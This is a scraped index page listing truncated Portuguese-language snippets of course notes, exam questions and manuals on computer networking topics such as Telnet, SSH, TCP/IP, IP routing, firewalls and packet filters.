Protocolos Telnet e SSH Professor Leonardo Larback Protocolo Telnet O modelo de referência TCP/IP inclui um protocolo simples de terminal remoto: Telnet. O telnet é tanto um programa quanto um protocolo,
Leia maisArquitetura e Protocolos de Rede TCP/IP. Modelo Arquitetural
Arquitetura e Protocolos de Rede TCP/IP Modelo Arquitetural Motivação Realidade Atual Ampla adoção das diversas tecnologias de redes de computadores Evolução das tecnologias de comunicação Redução dos
Leia mais3. Explique o motivo pelo qual os protocolos UDP e TCP acrescentam a informação das portas (TSAP) de origem e de destino em seu cabeçalho.
Entregue três questões de cada prova. Prova de 2011-02 1. Descreva duas maneiras de estabelecer uma conexão entre processos na camada de transporte sem o conhecimento da porta (TSAP) ao qual o servidor
Leia maisMicrosoft Office Outlook Web Access ABYARAIMOVEIS.COM.BR
Microsoft Office Outlook Web Access ABYARAIMOVEIS.COM.BR 1 Índice: 01- Acesso ao WEBMAIL 02- Enviar uma mensagem 03- Anexar um arquivo em uma mensagem 04- Ler/Abrir uma mensagem 05- Responder uma mensagem
Leia maisInterconexão de Redes. Aula 03 - Roteamento IP. Prof. Esp. Camilo Brotas Ribeiro cribeiro@catolica-es.edu.br
Interconexão de Redes Aula 03 - Roteamento IP Prof. Esp. Camilo Brotas Ribeiro cribeiro@catolica-es.edu.br Revisão Repetidor Transceiver Hub Bridge Switch Roteador Domínio de Colisão Domínio de Broadcast
Leia maisManual do Desktop Sharing. Brad Hards Tradução: Marcus Gama
Brad Hards Tradução: Marcus Gama 2 Conteúdo 1 Introdução 5 2 O protocolo do Buffer de Quadro Remoto (Buffer de Quadro Remoto) 6 3 Usando o Desktop Sharing 7 3.1 Gerenciando convites do Desktop Sharing........................
Leia maisAULA 03 MODELO OSI/ISO. Eduardo Camargo de Siqueira REDES DE COMPUTADORES Engenharia de Computação
AULA 03 MODELO OSI/ISO Eduardo Camargo de Siqueira REDES DE COMPUTADORES Engenharia de Computação INTRODUÇÃO 2 INTRODUÇÃO 3 PROTOCOLOS Protocolo é a regra de comunicação usada pelos dispositivos de uma
Leia maisUNIVERSIDADE FEDERAL DE PELOTAS
Usando um firewall para ajudar a proteger o computador A conexão à Internet pode representar um perigo para o usuário de computador desatento. Um firewall ajuda a proteger o computador impedindo que usuários
Leia maisSISTEMAS DISTRIBUIDOS
1 2 Caracterização de Sistemas Distribuídos: Os sistemas distribuídos estão em toda parte. A Internet permite que usuários de todo o mundo acessem seus serviços onde quer que possam estar. Cada organização
Leia maisSistemas Operacionais. Prof. André Y. Kusumoto andrekusumoto.unip@gmail.com
Sistemas Operacionais Prof. André Y. Kusumoto andrekusumoto.unip@gmail.com Estruturas de Sistemas Operacionais Um sistema operacional fornece o ambiente no qual os programas são executados. Internamente,
Leia mais4. Qual seria o impacto da escolha de uma chave que possua letras repetidas em uma cifra de transposição?
Prova de 2011-02 1. Descreva duas maneiras de estabelecer uma conexão entre processos na camada de transporte sem o conhecimento da porta (TSAP) ao qual o servidor remoto esteja associado. 2. Estabelecer
Leia maisAuditoria e Segurança de Sistemas Segurança de Redes de Computadores Adriano J. Holanda
Auditoria e Segurança de Sistemas Segurança de Redes de Computadores Adriano J. Holanda Segurança na rede Segurança na rede refere-se a qualquer atividade planejada para proteger sua rede. Especificamente
Leia maisExecícios de Revisão Redes de Computadores Edgard Jamhour. Filtros de Pacotes Criptografia SSL
Execícios de Revisão Redes de Computadores Edgard Jamhour Filtros de Pacotes Criptografia SSL Exercício 1 Configure as regras do filtro de pacotes "E" para permitir que os computadores da rede interna
Leia maisExecícios de Revisão Redes de Computadores Edgard Jamhour. Proxy, NAT Filtros de Pacotes
Execícios de Revisão Redes de Computadores Edgard Jamhour Proxy, NAT Filtros de Pacotes Exercício 1 Configure as regras do filtro de pacotes "E" para permitir que os computadores da rede interna tenham
Leia maisMais configuração OptraImage
1 fax Personalizarconfiguraçõesdecópia...2 Definirmanualmenteasinformaçõesbásicasdofax...3 Criardestinospermanentesdefax...5 Alterarasconfiguraçõesderecebereenviarfax...7 Ajustarasopçõesdeenviodefax...8
Leia maisSubmissão Autenticada de Ficheiros ao SIGEX
Submissão Autenticada de Ficheiros ao SIGEX Segurança em Sistemas Informáticos José Martins - ei06031@fe.up.pt Marcelo Cerqueira - ei06093@fe.up.pt Grupo 10, T4 Índice Introdução... 3 Problema e Objectivos...
Leia mais